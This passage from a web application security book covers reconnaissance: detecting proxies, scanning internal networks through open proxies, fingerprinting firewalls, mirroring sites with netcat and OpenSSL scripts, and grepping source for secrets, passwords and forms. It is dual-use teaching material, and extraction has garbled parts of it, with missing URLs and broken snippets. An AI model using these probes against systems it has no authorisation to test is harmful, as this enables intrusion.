As a general rule, if you don’t know it, then Google it! Enumerating SSL Anomalies This is a last-ditch effort when it comes to identifying proxies and load balancers. If you’re sure that the application is, in fact, being load balanced but none of the methods listed previously work, then you might as well try to see if the site’s SSL certificates contain differences, or whether the SSL certificates each support the same cipher strengths. For example, one of the servers may support only 128-bit encryption, just as it should. But suppose the site administrator forgot to apply that policy to other servers, and they support all ciphers from 96-bit and up. A mistake like this confirms that the web site is being load balanced. Examining HTML Source Code Although we’ll talk about this in more depth when we get to the “Application Profiling” section later in this chapter, it’s important to note that HTML source code can also reveal load balancers. For example, multiple requests for the same page might return different comments in HTML source, as shown next (HTML comments are delineated by the One of the pages on the site reveals more cryptic HTML comments. After sampling it five times, the comments were compared, as shown here: Chapter 2: Profiling 41 It appears that content of the comments are MD5 hashes with a salt of whfh at the beginning. Though we can’t be sure. We’ll talk more about how to gather and identify HTML comments in the upcoming section on application profiling. Detecting Proxies Not so surprisingly, you’ll find that some of your most interesting targets are supposed to be invisible. Devices like proxies are supposed to be transparent to end users, but they’re great attack points if you can find them. Listed next are some methods you can use to determine whether your target site is running your requests through a proxy. TRACE Request A TRACE request tells the web server to echo back the contents of the request just as it received it. This command was placed into HTTP 1.1 as a debugging tool. Fortunately for us, however, it also reveals whether our requests are traveling through proxy servers before getting to the web server. By issuing a TRACE request, the proxy server will modify the request and send it to the web server, which will then echo back exactly what request it received. By doing this, we can identify what changes the proxy made to the request. Proxy servers will usually add certain headers, so look for headers like these: "Via:","X-Forwarded-For:","Proxy-Connection:" TRACE / HTTP/1.1 Host: HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Date: Tue, 16 Aug 2005 14:27:44 GMT Content-length: 49 TRACE / HTTP/1.1 Host: Via: 1.1 When your requests go through a reverse proxy server, you will get different results. A reverse proxy is a front-end proxy that routes incoming requests from the Internet to the backend servers. Reverse proxies will usually modify the request in two ways. First, they’ll remap the URL to point to the proper URL on the inside server. For example, TRACE /folder1/index.aspx HTTP/1.1 might turn into TRACE /site1/ folder1/index.asp HTTP/1.1. Second, reverse proxies will change the Host: header to point to the proper internal server to forward the request to. Looking at the example, you’ll see that the Host: header was changed to HTTP/1.1 200 OK Server: Microsoft-IIS/5.1 Date: Tue, 16 Aug 2005 14:27:44 GMT Content-length: 49 TRACE / HTTP/1.1 Host: 42 Hacking Exposed Web Applications Standard Connect Test The CONNECT command is primarily used in proxy servers to proxy SSL connections. With this command, the proxy makes the SSL connection on behalf of the client. For instance, sending a CONNECT .com:443 will instruct the proxy server to make the connection an SSL connection to on port 443. And if the connection is successful, the CONNECT command will tunnel the user’s connection and the secure connection together. However, this command can be abused when it is used to connect servers inside the network. A simple method to check if a proxy is present is to send a CONNECT to a known site like and see if it complies. Many times a firewall may well protect against this technique, so you might want to try to guess some internal IP addresses and use those as your test. The following example shows how the CONNECT method can be used to connect to a remote web server: *Request* CONNECT remote-webserver:80 HTTP/1.0 User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 4.0) Host: remote-webserver *Successful Response* HTTP/1.0 200 Connection established Standard Proxy Request Another method you might try is to insert the address of a public web site and see if the proxy server returns the response from that web site. If so, this means you can direct the server to any address of your choice, allowing your proxy server to be an open, anonymous proxy to the public or, worse, allowing the attacker to access your internal network. This is demonstrated next. At this point, a good technique to use would be to attempt to identify what the internal IP address range of your target is and then port scan that range. This same method can be successfully applied using the CONNECT command as well. For example, a standard open proxy test using this mechanism would look something like the following: GET HTTP/1.0 You could also use this technique to scan a network for open web servers: GET HTTP/1.0 GET HTTP/1.0 Chapter 2: Profiling 43 You can even conduct port scanning in this manner: GET HTTP/1.0 GET HTTP/1.0 GET HTTP/1.0 Detecting Web App Firewalls Web application firewalls are protective devices that are placed inline between the user and the web server. The app firewall analyzes HTTP traffic to determine if it’s valid traffic and tries to prevent web attacks. You could think of them as Intrusion Prevention Systems (IPS) for the web application. Web application firewalls are still relatively rare to see when assessing an application, but being able to detect them is still very important. The examples explained in the following sections are not a comprehensive listing of ways to fingerprint web application firewalls, but they should give you enough information to identify one when you run into this defense. Detecting whether an application firewall is running in front of an application is actually quite easy. If, throughout your testing, you keep getting kicked out, or the session times out when issuing an attack request, an application firewall is likely between you and the application. Another indication would be when the web server does not respond the way it generally does to unusual requests but instead always returns the same type of error. Listed next are some common web app firewalls and some very simple methods of detecting them. Teros The Teros web application firewall technology will respond to a simple TRACE request or any invalid HTTP method such as PUT with the following error: TRACE / HTTP/1.0 Host: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) HTTP/1.0 500 Content-Type: text/html Error

ERROR: 500

Invalid method code
Another easy way to detect a Teros box is by spotting the cookie that it issues, which looks similar to this: st8id 1e1bcc1010b6de32734c584317443b31.00.d5134d14e9730581664bf5cb1b610784) The value of the cookie will, of course, change but the cookie name st8id is the giveaway, and in most cases, the value of the cookie will have the similar character set and length. 44 Hacking Exposed Web Applications F5 TrafficShield When you send abnormal requests to F5’s TrafficShield, you might get responses that contain errors like those listed here. For instance, here we send a PUT method with no data: PUT / HTTP/1.0 Host: User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0) HTTP/1.0 400 Bad Request Content-Type: text/html Error

HTTP Error 400

400 Bad Request

The server could not understand your request.
Your error ID is: 5fa97729 TrafficShield also has a standard cookie that is used with its device. The cookie name is ASINFO, and here is an example of what the cookie looks like: ASINFO 1a92a506189f3c75c3acf0e7face6c6a04458961401c4a9edbf52606a4c47b1c 3253c468fc0dc8501000ttrj40ebDtxt6dEpCBOpiVzrSQ0000 Netcontinuum Detecting a Netcontinuum application firewall deployment is similar to the others. Just look for its cookie. In the event that its cookie is not present, we’ve noticed that these devices respond to every invalid request with a 404 error—which is quite abnormal for any web server to do. The Netcontinuum cookie is shown here: NCI SessionId 009C5f5AQEwIPUC3/TFm5vMcLX5fjVfachUDSNaSFrmDKZ/ LiQEuwC+xLGZ1FAMA+ URLScan URLScan is a free ISAPI filter that provides great flexibility for controlling HTTP requests, but we don’t consider URLScan a true application firewall. Products like these don’t provide dynamic protection; instead, they rely on a lengthy configuration file of signatures or allowed lengths to stop attacks. Detecting URLScan can be simple, as long as it is implemented with its default rules. For example, by default, URLScan has a rule that restricts a path to a length of 260 characters, so if you send a request that has a path of more than 260 characters, URLScan will respond with a 404 ( /’s)). URLScan will also reject the request if you add any of the following headers to the request: • Translate: • If: • Lock Token: • Transfer Encoding: Chapter 2: Profiling 45 Using these headers will cause URLScan to return a 404. But, in any other situation, the web server would just ignore the extra headers and respond normally to the request that you sent it. SecureIIS SecureIIS is like URLScan on steroids—it is a pumped-up commercial version that adds a nice GUI and some nifty features. Using it is a lot easier than editing a big configuration file like URLScan, but detecting it is pretty similar. Study the default rules that it ships with and break them—this will cause SecureIIS to return a deny response, which, by default, is a 406 error code (note that the commercial version allows this to be changed). One of the default rules is to limit the length of any header value to 1024 characters. So just set a header value above that limit and see if the request gets denied. SecureIIS’s Default Deny Page is quite obvious: it states that a security violation has occurred and even gives the SecureIIS logo and banner. Of course, most people using this product in production will have that changed. Observing the HTTP response can be more revealing, as SecureIIS implements an unusual 406 “Not Acceptable” response to requests with over-large headers. APPLICATION PROFILING Now that we’ve covered the logistics of infrastructure profiling, we can get to the meat of surveying the application itself. It may be mundane and boring work, but this is where we’ve consistently experienced big breakthroughs during our professional consulting work. The purpose of surveying the application is to generate a complete picture of the content, components, function, and flow of the web site in order to gather clues about where underlying vulnerabilities might be. Whereas an automated vulnerability checker typically searches for known vulnerable URLs, the goal of an extensive application survey is to see how each of the pieces fit together. A proper inspection can reveal problems with aspects of the application beyond the presence or absence of certain traditional vulnerability signatures. Cursorily, application profiling is easy. You simply crawl or click through the application and pay attention to the URLs and how the entire web site is structured. Depending on your level of experience, you should be able to recognize quickly what language the site is written in, basic site structure, use of dynamic content, and so on. We can’t stress enough how vital it is to pay close attention to each detail you uncover during this research. Become a keen note-taker and study each fact you unearth, because it just may be an insignificant-looking CSS file that contains an informational gem, such as a comment that directs you to a certain application. This section will present a basic approach to web application profiling comprised of the following key tasks: • Manual inspection • Search tools 46 Hacking Exposed Web Applications • Automated crawling • Common web application profiles Manual Inspection The first thing we usually do to profile an application is a simple click-through. Become familiar with the site, look for all the menus, and watch the directory names in the URL change as you navigate. Web applications are complex. They may contain a dozen files, or they may contain a dozen well-populated directories. Therefore, documenting the application’s structure in a well-ordered manner helps you track insecure pages and provides a necessary reference for piecing together an effective attack. Documenting the Application Opening a text editor is the first step, but a more elegant method is to create a matrix in a program like Microsoft Excel to store information about every page in the application. We suggest documenting things such as: • Page name Listing files in alphabetical order makes tracking down information about a specific page easier. These matrices can get pretty long! • Full path to the page This is the directory structure leading up to the page. You can combine this with the page name for efficiency. • Does the page require authentication? Yes or no. • Does the page require SSL? The URI for a page may be HTTPS, but that does not necessarily mean the page cannot be accessed over normal HTTP. Put the delete key to work and remove the “S”! • GET/POST arguments Record the arguments that are passed to the page. Many applications are driven by a handful of pages that operate on a multitude of arguments. • Comments Make personal notes about the page. Was it a search function, an admin function, or a Help page? Does the page “feel” insecure? Does it contain privacy information? This is a catch-all column. A partially completed matrix may look similar to Table 2-1. We will talk about authentication more in Chapter 4, but for now, it is important to simply identify the method. Also, just because the /main/login.jsp page requires authentication does not mean that all pages require authentication; for instance, the /main/menu.jsp page may not. This step is where misconfigurations will start to become evident. Another surveying aid is the flowchart. A flowchart helps consolidate information about the site and present it in a clear manner. With an accurate diagram, you can Chapter 2: Profiling 47 Page Index.html Login.asp Company.html Path / /login/ /about/ Auth? N N N SSL? N Y N GET/POST POST password Comments Main auth page Company info Table 2-1 A Sample Matrix for Documenting Web Application Structure visualize the application processes and perhaps discover weak points or inadequacies in the design. The flowchart can be a block diagram on a white board or a three-page diagram with color-coded blocks that identify static pages, dynamic pages, database access routines, and other macro functions. Many web spidering applications such as WebSphinx have graphing capabilities. Figure 2-3 shows an example web application flowchart. For a serious in-depth review, we recommend mirroring the application on your local hard drive as you document. You can build this mirror automatically with a tool (as we’ll discuss later in the “Automated Web Crawling” section), or you can populate it manually. It is best to keep the same directory structure as the target application. For example: /admin/admin.html /main/index.html /menu/menu.asp Figure 2-3 A flowchart like this sample can be quite helpful in documenting web application structure. 48 Hacking Exposed Web Applications Modulate the effort spent mirroring the target site versus how often you expect it to change in the coming months. Some other information you should consider recording in your matrix/flowchart includes the following: • Statically and dynamically generated pages • Directory structure • Common file extensions • Common files • Helper files • Java classes and applets • Flash and Silverlight objects • HTML source code • Forms • Query strings and parameters • Common cookies • Backend access points We’ll talk about each of these in more detail in the next few sections. Statically and Dynamically Generated Pages Static pages are the generic .html files usually relegated to FAQs and contact information. They may lack functionality to attack with input validation tests, but the HTML source may contain comments or information. At the very least, contact information reveals e-mail addresses and usernames. Dynamically generated pages (.asp, .jsp, .php, etc.) are more interesting. Record a short comment for interesting pages such as “administrator functions,” “user profile information,” or “cart view.” As we noted earlier, as you manually profile an application, it’s a good idea to mirror the structure and content of the application to local disk. For example, if www.victim .com has an /include/ file, then create a top-level directory called “www” and a subdirectory called “include”, and place the file in the include directory. The text-based browser, lynx, can accelerate this process: [root@meddle ]# mkdir [root@meddle ]# cd [root@meddle]# lynx –dump > index.html Netcat is even better because it will also dump the server headers: [root@meddle ]# mkdir [root@meddle ]# cd Chapter 2: Profiling 49 [root@meddle]# echo -e "GET /index.html HTTP/1.0\n\n" | \ > nc -vv 80 > index.html [] 80 (http) open sent 27, rcvd 2683: NOTSOCK To automate the process even more (laziness is a mighty virtue!), create a wrapper script for netcat. This script will work on UNIX/Linux systems and Windows systems with the Cygwin utilities installed. Create a file called and place it in your execution path. Here’s an example script that we use in web security assessments: #!/bin/sh # mike's script if [ -z $1 ]; then echo -e "\n\tUsage: $0 " exit fi echo -e "GET $2 HTTP/1.0\n\n" | \ nc -vv $1 80 Wait a minute! Lynx and Mozilla can handle pages that are only accessible via SSL. Can I use netcat to do the same thing? Short answer: No. You can, however, use the OpenSSL package. Create a second file called and place it in your execution path: #!/bin/sh # mike's script if [ -z $1 ]; then echo -e "\n\tUsage: $0 " exit fi echo -e "GET $2 HTTP/1.0\n\n" | \ openssl s client -quiet -connect $1:443 2>/dev/null The versatility of the “getit” scripts does not end with two command-line arguments.You can craft them to add cookies, user-agent strings, host strings, or any other HTTP header. All you need to modify is the echo e line. Now you’re working on the command line with HTTP and HTTPS. The web applications are going to fall! So, instead of saving every file from your browser or running lynx, use the getit scripts shown previously, as illustrated in this example: [root@meddle ]# mkdir [root@meddle ]# cd [root@meddle]# /index.html > 50 Hacking Exposed Web Applications index.html [] 80 (http) open sent 27, rcvd 2683: NOTSOCK [root@meddle ]# mkdir secure [root@meddle ]# cd secure [root@meddle secure]# /secure/admin.html > admin.html The OpenSSL s_client is more verbose than netcat and always seeing its output becomes tiring after a while. As we go through the web application, you will see how important the and scripts become. Keep them handy. You can download dynamically generated pages with the getit scripts as long as the page does not require a POST request. This is an important feature because the contents of some pages vary greatly depending on the arguments they receive. Here’s another example; this time retrieves the output of the same menu.asp page, but for two different users: [root@meddle main]# \ > /main/menu.asp?userID 002 > menu.002.asp [] 80 (http) open sent 40, rcvd 3654: NOTSOCK [root@meddle main]# \ > /main/menu.asp?userID 007 > menu.007.asp [] 80 (http) open sent 40, rcvd 5487: NOTSOCK Keep in mind the naming convention that the site uses for its pages. Did the programmers dislike vowels (usrMenu.asp, Upld.asp, hlpText.php)? Were they verbose ( Were they utilitarian with the scripts (main.asp has more functions than an obese Swiss Army knife)? The naming convention provides an insight into the programmers’ mindset. If you found a page called UserMenu.asp, chances are that a page called AdminMenu.asp also exists. The art of surveying an application is not limited to what you find by induction. It also involves a deerstalker cap and a good amount of deduction. Directory Structure The structure of a web application will usually provide a unique signature. Examining things as seemingly trivial as directory structure, file extensions, naming conventions used for parameter names or values, and so on, can reveal clues that will immediately identify what application is running (see the upcoming section “Common Web Application Profiles,” later in this chapter, for some crisp examples of this). Obtaining the directory structure for the public portion of the site is trivial. After all, the application is designed to be surfed. However, don’t stop at the parts visible through the browser and the site’s menu selections. The web server may have directories for Chapter 2: Profiling 51 administrators, old versions of the site, backup directories, data directories, or other directories that are not referenced in any HTML code. Try to guess the mindset of the administrators and site developers. For example, if static content is in the /html directory and dynamic content is in the /jsp directory, then any cgi scripts may be in the /cgi directory. Other common directories to check include these: • Directories that have supposedly been secured, either through SSL, authentication, or obscurity: /admin/ /secure/ /adm/ • Directories that contain backup files or log files: /.bak/ /backup/ /back/ / log/ /logs/ /archive/ /old/ • Personal Apache directories: /~root/ /~bob/ /~cthulhu/ • Directories for include files: /include/ /inc/ /js/ /global/ /local/ • Directories used for internationalization: /de/ /en/ /1033/ /fr/ This list is incomplete by design. One application’s entire directory structure may be offset by /en/ for its English-language portion. Consequently, checking for /include/ will return a 404 error, but checking for /en/include/ will be spot on. Refer back to your list of known directories and pages documented earlier using manual inspection. In what manner have the programmers or system administrators laid out the site? Did you find the /inc/ directory under /scripts/? If so, try /scripts/js/ or /scripts/inc/js/ next. Attempting to enumerate the directory structure can be an arduous process, but the getit scripts can help whittle any directory tree. Web servers return a non-404 error code when a GET request is made to a directory that exists on the server. The code might be 200, 302, or 401, but as long as it isn’t a 404 you’ve discovered a directory. The technique is simple: [root@meddle]# /isapi [] 80 (http) open HTTP/1.1 302 Object Moved Location: http://tk421/isapi/ Server: Microsoft-IIS/5.0 Content-Type: text/html Content-Length: 148 Document Moved

Object Moved

This document may be found heresent 22, rcvd 287: NOTSOCK Using our trusty script, we made a request for the /isapi/ directory; however, we omitted an important piece. The trailing slash was left off the directory name, causing an IIS server to produce a redirect to the actual directory. As a by-product, it also reveals the internal hostname or IP address of the server—even when it’s behind a firewall or 52 Hacking Exposed Web Applications load balancer. Apache is just as susceptible. It doesn’t reveal the internal hostname or IP address of the server, but it will reveal virtual servers: [root@meddle]# /mail [] 80 (http) open HTTP/1.1 301 Moved Permanently Date: Wed, 30 Jan 2002 06:44:08 GMT Server: Apache/2.0.28 (Unix) Location: Content-Length: 308 Connection: close Content-Type: text/html; charset iso-8859-1 301 Moved Permanently

Moved Permanently

The document has moved here.

Apache/2.0.28 Server at Port 80
sent 21, rcvd 533: NOTSOCK That’s it! If the directory does not exist, then you will receive a 404 error. Otherwise, keep chipping away at that directory tree. Another tool that can reduce time and effort when traversing a web application for hidden folders is OWASP DirBuster. DirBuster is a multithreaded Java application that is designed to brute-force directories and files on a web server. Based on a user-supplied dictionary file, DirBuster will attempt to crawl the application and guess at non-linked directories and files with a specific extension. For example, if the application uses PHP, the user would specify “php” as a file extension and DirBuster would guess for a file named [dictionary word].php in every directory the crawler encounters (see Figure 2-4). DirBuster can recursively scan new directories that it finds and performance is adjustable. It should be noted that recursive scanning with DirBuster generates a lot of traffic, and the thread count should be reduced in an environment where an excessive number of requests is undesirable. Common File Extensions File extensions are a great indicator of the nature of an application. File extensions are used to determine the type of file, either by language or its application association. File extensions also tell web servers how to handle the file. While certain extensions are executable, others are merely template files. The list shown next contains common extensions found in web applications and what their associations are. If you don’t know Chapter 2: Profiling 53 Figure 2-4 OWASP DirBuster tool is used to brute-force hidden directories and files. what application an extension is associated with, just try searching the extension using an Internet search engine like Google (for example, using the syntax “allinurl:.cfm”). This will allow you to identify other sites that may use that extension, which can help you narrow down what applications the extension is associated with. Another handy resource for researching file extensions is, which allows you to find out what application an extension is associated with. Table 2-2 lists some common file extensions and the application or technology that typically uses them. Keep Up-to-Date on Common Web Application Software Because assessing web applications is our job, we usually want to familiarize ourselves with popular web application software as much as possible. We’re always playing around with the latest off-the-shelf/ open-source web applications. Go to or and look at the 50 most popular freeware web applications. These are used in many applications. Just by knowing how they work and how they feel will help you to recognize their presence quickly when assessing a site. 54 Hacking Exposed Web Applications Application/Technology ColdFusion ASP.NET Lotus Domino ASP WebSphere PeopleSoft BroadVision Oracle App Server Perl CGI Python PHP SSI Java Common File Extension .cfm .aspx .nsf .asp .d2w .GPL .do .show .pl .cgi .py .php/.php3/.php4 .shtml .jsp/.java Table 2-2 Common File Extensions and the Application or Technology That Typically Uses Them Common Files Most software installations will come with a number of well-known files, for instance: • Readme • ToDo • Changes • Install.txt • EULA.txt By searching every folder and subfolder in a site, you might just hit on plenty of useful information that will tell you what applications and versions are running and a nice URL that will lead you to a download page for software and updates. If you don’t have either the time or the ability to check every folder, you should always be sure to at least hit the site’s root directory where these file types are often held (for example, http:// Most administrators or developers will follow a default install, or they will unzip the entire contents of the archive right into the web root. These guys are very helpful! Chapter 2: Profiling 55 Helper Files Helper file is a catch-all appellation for any file that supports the application but usually does not appear in the URL. Common “helpers” are JavaScript files. They are often used to format HTML to fit the quirks of popular browsers or perform client-side input validation. • Cascading Style Sheets CSS files (.css) instruct the browser on how to format text. They rarely contain sensitive information, but enumerate them anyway. • XML Style Sheets Applications are turning to XML for data presentation. Style sheets (.xsl) define the document structure for XML requests and formatting. They tend to have a wealth of information, often listing database fields or referring to other helper files. • JavaScript Files Nearly every web application uses JavaScript (.js). Much of it is embedded in the actual HTML file, but individual files also exist. Applications use JavaScript files for everything from browser customization to session handling. In addition to enumerating these files, it is important to note what types of functions the file contains. • Include Files On IIS systems, include files (.inc) often control database access or contain variables used internally by the application. Programmers love to place database connection strings in this file—password and all! • The “Others” References to ASP, PHP, Perl, text, and other files might be in the HTML source. URLs rarely refer to these files directly, so you must turn to the HTML source in order to find them. Look for these files in Server Side Include directives and script tags. You can inspect the page manually or turn to your handy command-line tools. Download the file and start the search. Try common file suffixes and directives: .asp .inc "); Output like this tells us two things. One, there are aw/pics/js/ and stats/ directories that we hadn’t found earlier. Two, there are several JavaScript files that follow a naming convention of ss_main_v-*.js, where the asterisk represents some value. A little more source-sifting would tell us this value. 56 Hacking Exposed Web Applications You can also guess common filenames. Try a few of these in the directories you enumerated in the previous step: global.js local.js menu.js toolbar.js Again, all of this searching does not have to be done by hand. We’ll talk about tools to automate the search in the sections entitled “Search Tools for Profiling” and “Automated Web Crawling” later in this chapter. Java Classes and Applets Java-based applications pose a special case for source-sifting and surveying the site’s functionality. If you can download the Java classes or compiled servlets, then you can actually pick apart an application from the inside. Imagine if an application used a custom encryption scheme written in a Java servlet. Now, imagine you can download that servlet and peek inside the code. Finding applets in web applications is fairly simple: just look for the applet tag code that looks like this: Java is designed to be a write-once, run-anywhere language. A significant byproduct of this is that you can actually decompile a Java class back into the original source code. The best tool for doing this is the Java Disassembler, or jad. Decompiling a Java class with jad is simple: [root@meddle]# jad SnoopServlet.class Parsing SnoopServlet.class... Generating SnoopServlet.jad [root@meddle]# cat SnoopServlet.jad // Decompiled by Jad v1.5.7f. Copyright 2000 Pavel Kouznetsov. // Jad home page: // // Decompiler options: packimports(3) // Source File Name: import; import; import java.util.Enumeration; Chapter 2: Profiling 57 import javax.servlet.*; import javax.servlet.http.*; public class SnoopServlet extends HttpServlet { ...remainder of decompiled Java code... You don’t have to be a full-fledged Java coder in order for this tool to be useful. Having access to the internal functions of the site enables you to inspect database calls, file formats, input validation (or lack thereof), and other server capabilities. You may find it difficult to obtain the actual Java class, but try a few tricks such as these: • Append .java or .class to a servlet name. For example, if the site uses a servlet called “/servlet/LogIn”, then look for “/servlet/LogIn.class”. • Search for servlets in backup directories. If a servlet is in a directory that the servlet engine does not recognize as executable, then you can retrieve the actual file instead of receiving its output. • Search for common test servlets. Some of these are SessionServlet, AdminServlet, SnoopServlet, and Test. Note that many servlet engines are case-sensitive, so you will have to type the name exactly. Applets seem to be some of the most insecure pieces of software. Most developers take no consideration of the fact that these can easily be decompiled and give up huge amounts of information. Applets are essentially thick clients that contain all the code needed to communicate with the server. Multiple times we have seen an applet send straight SQL queries directly to the application or the applet use a special guest account to do certain functions and the username and password will be embedded in the code. Always rejoice if you see an applet that is used for sensitive types of actions, as nine times out of ten you will find some really good security issues once it is decompiled. If the applet cannot be decompiled due to the use of some good obfuscation techniques, then reverse engineer the applet by studying the communication stream to the web server. Most applets will follow the proxy settings in your browser, so by setting them to point to your handy proxy tool, most of the applet’s communication will be visible. In some cases, the applet will not follow the browser proxy settings. In this scenario, falling back to old-school methods will work, so pull out the trusty sniffer program. Flash and Silverlight Objects Interactive web site components are becoming more prevalent. As developers embrace new technologies such as Flash and Silverlight, more application logic is being pushed to the client. In parallel with this trend, client-side logic has become the target of choice for modern attackers. Just as it is possible to disassemble Java applets, it is possible to peek inside the functionality of client-side code like Flash SWF files and the .NET modules that power Silverlight components. We’ll cover attacks against Flash and Silverlight, as well as defensive countermeasures, in Chapter 9. 58 Hacking Exposed Web Applications HTML Source Code HTML source code can contain numerous juicy tidbits of information. HTML Comments The most obvious place attackers look is in HTML comments, special sections of source code where the authors often place informal remarks that can be quite revealing. The < characters mark all basic HTML comments. HTML comments are a hit-or-miss prospect. They may be pervasive and uninformative, or they may be rare and contain descriptions of a database table for a subsequent SQL query, or worse yet, user passwords. The next example shows how our script can obtain the index.html file for a site, and then pipe it through the UNIX/Linux grep command to find HTML comments (you can use the Windows findstr command similarly to the grep command). The ! character has special meaning on the Unix/Linux command line and will need to be escaped using "\in grep searches. [root@meddle ]# /index.html | grep "<\!--" [] 80 (http) open sent 17, rcvd 16417: NOTSOCK At the very least, this example shows us that the index.html file is actually a link to index.shtml. The .shtml extension implies that parts of the page were created with Server Side Includes. Induction plays an important role when profiling the application, which is why it’s important to familiarize yourself with several types of web technologies. Pop quiz: What type of program could be responsible for the information in the $Id shown in the previous example? You can use this method (using our getit script or the automated web crawling tool of your choice) to dump the comments from the entire site into one file and then review that file for any interesting items. If you find something that looks promising, you can search the site for that comment to find the page it’s from and then carefully study that page to understand the context of the comment. This process can reveal even more interesting information, including: • Filename-like comments You will typically see plenty of comments with template filenames tucked in them. Download them and review the template code. You never know what you might find. • Old code Look for links that might be commented out. They could point to an old portion of the web site that could contain security holes. Or maybe the link points to a file that once worked, but now, when you attempt to access it, a very revealing error message is displayed. • Auto-generated comments A lot of comments that you might see are automatically generated by web content software. Take the comment to a search Chapter 2: Profiling 59 engine and see what other sites turn up those same comments. Hopefully, you’ll discover what software generated the comments and learn useful information. • The obvious We’ve seen things like entire SQL statements, database passwords, and actual notes left for other developers in files such as IRC chat logs within comments. Other HTML Source Nuggets Don’t stop at comment separators. HTML source has all kinds of hidden treasures. Try searching for a few of these strings: SQL Password Select Catabase Insert Connect // #include #exec If you find SQL strings, thank the web hacking gods—the application may soon fall (although you still have to wait for Chapter 8 to find out why). The search for specific strings is always fruitful, but in the end, you will have to just open the file in Notepad or vi to get the whole picture. When using the grep command, play around with the i flag (ignore case), AN flag (show N lines after the matching line), and BN flag (show N lines before the matching line). Once in a while, syntax errors creep into dynamic pages. Incorrect syntax may cause a file to execute partially, which could leave raw code snippets in the HTML source. Here is a snippet of code (from a web site) that suffered from a misplaced PHP tag: Go to forum!\n"; $file "$subdir/list2.php? f $num"; if (readfile($file) 0) { echo "(0 messages so far)"; } ?> Another interesting thing to search for in HTML are tags that denote server-side execution, such as for PHP, and <% and %> and for ASP pages. These can reveal interesting tidbits that the site developer never intended the public to see. HTML source information can also provide useful information when combined with the power of Internet search engines like Google. For example, you might find developer names and e-mail addresses in comments. This bit of information by itself may not be that interesting, but what if you search on Google and identify that the developer posted multiple questions related to the development of his or her application? Now you suddenly have nice insight into how the application was developed. You could also assume that same information could be a username for one of the authenticated portions of the site and try brute-forcing passwords against that username. In one instance, a Google search on a username that turned up in HTML comments identified several other applications that the developer had written that were downloadable from his web site. Looking through the code, we learned that his application uses configuration data on the developer’s own web site! With a bit more 60 Hacking Exposed Web Applications effort, we found a DES administer password file within this configuration data. We downloaded this file and ran a password-cracking tool against it. Within an hour, we got the password and logged in as the administrator. All of this success thanks to a single comment and a very helpful developer’s homepage. Some final thoughts on HTML source-sifting: the rule of thumb is to look for anything that might contain information that you don’t yet know. When you see some weirdlooking string of random numbers within comments on every page of the file, look into it. Those random numbers could belong to a media management application that might have a web-accessible interface. The tiniest amount of information in web assessments can bring the biggest breakthroughs. So don’t let anything slide by you, no matter how insignificant it may seem at first. Forms Forms are the backbone of any web application. How many times have you unchecked the box that says, “Do not uncheck this box to not receive SPAM!” every time you create an account on a web site? Even English majors’ in-boxes become filled with unsolicited e-mail due to confusing opt-out (or is it opt-in?) verification. Of course, there are more important, security-related parts of the form. You need to have this information, though, because the majority of input validation attacks are executed against form information. When manually inspecting an application, note every page with an input field. You can find most of the forms by a click-through of the site. However, visual confirmation is not enough. Once again, you need to go to the source. For our command-line friends who like to mirror the entire site and use grep, start by looking for the simplest indicator of a form, its tag. Remember to escape the < character since it has special meaning on the command line: [root@meddle]# /index.html | grep -i \
Now you have the name of the form, gs; you know that it uses GET instead of POST; and it calls a script called “search” in the web root directory. Going back to the search for helper files, the next few files we might look for are, search.js,, and gs.js. A lucky guess never hurts. Remember to download the HTML source of the /search file, if possible. Next, find out what fields the form contains. Source-sifting is required at this stage, but we’ll compromise with grep to make things easy: [root@meddle]# /index.html | grep -i "input type" [] 80 (http) open Chapter 2: Profiling 61 This form shows three items: a login field, a password field, and the submit button with the text, “Login.” Both the username and password must be 15 characters or less (or so the application would like to believe). The HTML source reveals a fourth field called “name.” An application may use hidden fields for several purposes, most of which seriously inhibit the site’s security. Session handling, user identification, passwords, item costs, and other sensitive information tend to be put in hidden fields. We know you’re chomping at the bit to actually try some input validation, but be patient. We have to finish gathering all we can about the site. If you’re trying to create a brute-force script to perform FORM logins, you’ll want to enumerate all of the password fields (you might have to omit the \" characters): [root@meddle]# /index.html | \> grep -i "type \"password\"" [] 80 (http) open Tricky programmers might not use the password input type or have the words “password” or “passwd” or “pwd” in the form. You can search for a different string, although its hit rate might be lower. Newer web browsers support an autocomplete function that saves users from entering the same information every time they visit a web site. For example, the browser might save the user’s address. Then, every time the browser detects an address field (i.e., it searches for “address” in the form), it will supply the user’s information automatically. However, the autocomplete function is usually set to “off” for password fields: [root@meddle]# /login.html | \ > grep -i autocomplete [] 80 (http) open This might indicate that "val2" is a password field. At the very least, it appears to contain sensitive information that the programmers explicitly did not want the browser to store. In this instance, the fact that type="password" is not being used is a security issue, as the password will not be masked when a user enters her data into the field. So when inspecting a page’s form, make notes about all of its aspects: • Method Does it use GET or POST to submit data? GET requests are easier to manipulate on the URL. • Action What script does the form call? What scripting language was used (.pl, .sh, .asp)? If you ever see a form call a script with a .sh extension (shell script), mark it. Shell scripts are notoriously insecure on web servers. • Maxlength Are input restrictions applied to the input field? Length restrictions are trivial to bypass. 62 Hacking Exposed Web Applications • Hidden Was the field supposed to be hidden from the user? What is the value of the hidden field? These fields are trivial to modify. • Autocomplete Is the autocomplete tag applied? Why? Does the input field ask for sensitive information? • Password Is it a password field? What is the corresponding login field? Query Strings and Parameters Perhaps the most important part of a given URL is the query string, the part following the question mark (in most cases) that indicates some sort of arguments or parameters being fed to a dynamic executable or library within the application. An example is shown here: test This shows the parameter searchTerm with the value test being fed to the search.cgi executable on this site. Query strings and their parameters are perhaps the most important piece of information to collect because they represent the core functionality of a dynamic web application, usually the part that is the least secure because it has the most moving parts. You can manipulate parameter values to attempt to impersonate other users, obtain restricted data, run arbitrary system commands, or execute other actions not intended by the application developers. Parameter names may also provide information about the internal workings of the application. They may represent database column names, be obvious session IDs, or contain the username. The application manages these strings, although it may not validate them properly. Fingerprinting Query Strings Depending on the application or how the application is tailored, parameters have a recognizable look and implementation that you should be watching for. As we noted earlier, usually anything following the ? in the query string includes parameters. In complex and customized applications, however, this rule does not always apply. So one of the first things that you need to do is to identify the paths, filenames, and parameters. For example, in the list of URLs shown in Table 2-3, spotting the parameters starts out easy and gets more difficult. The method that we use to determine how to separate these parameters is to start deleting items from the URL. An application server will usually generate a standard error message for each part. For example, we may delete everything up to the slash from the URL, and an error message may be generated that says something like “Error Unknown Procedure.” We then continue deleting segments of the URL until we receive a different error. Once we reach 